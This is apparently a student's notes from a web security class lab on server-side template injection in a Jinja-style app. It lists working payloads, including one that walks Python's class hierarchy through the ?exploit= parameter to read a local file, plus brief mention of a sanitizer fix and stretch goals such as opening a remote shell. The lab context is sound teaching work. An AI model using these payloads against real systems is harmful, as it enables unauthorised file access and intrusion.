[BEW 2.3: Web Security] Clone this repo to begin the SSTI exploit activity.
Use the provided ?exploit= param to…
-
Multiply 2 integers
?exploit={{2*5}} -
Multiply an int & a str
?exploit={%%20set%20banana%20=%202%}{{banana%20*%202}}
-
Output hack.txt from the local filesystem
- https://stackoverflow.com/questions/14188451/get-multiple-request-params-of-the-same-name
- I actually had to get help with this one(sorry if that wasn't allowed) but shout out to Luc.
- Trying to figure this one out was kinda like reading a traceback. Each part retruned a tuple, object, or list that I could go deeper into.
- Output: b'It works!\n' (idk how to remove the b)
?param=./hack.txt&exploit={{config.items().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[1](request[request.args.param],request[request.args.param|string]).get_data(request.args.param)}}
-
Fix and prevent the exploit!
created a sanitizer to convert non-allowed characters into nothing. preventing all the stuff I just did.
-
Stretch: Use magic methods to expose more info
-
Stretch: Open a remote shell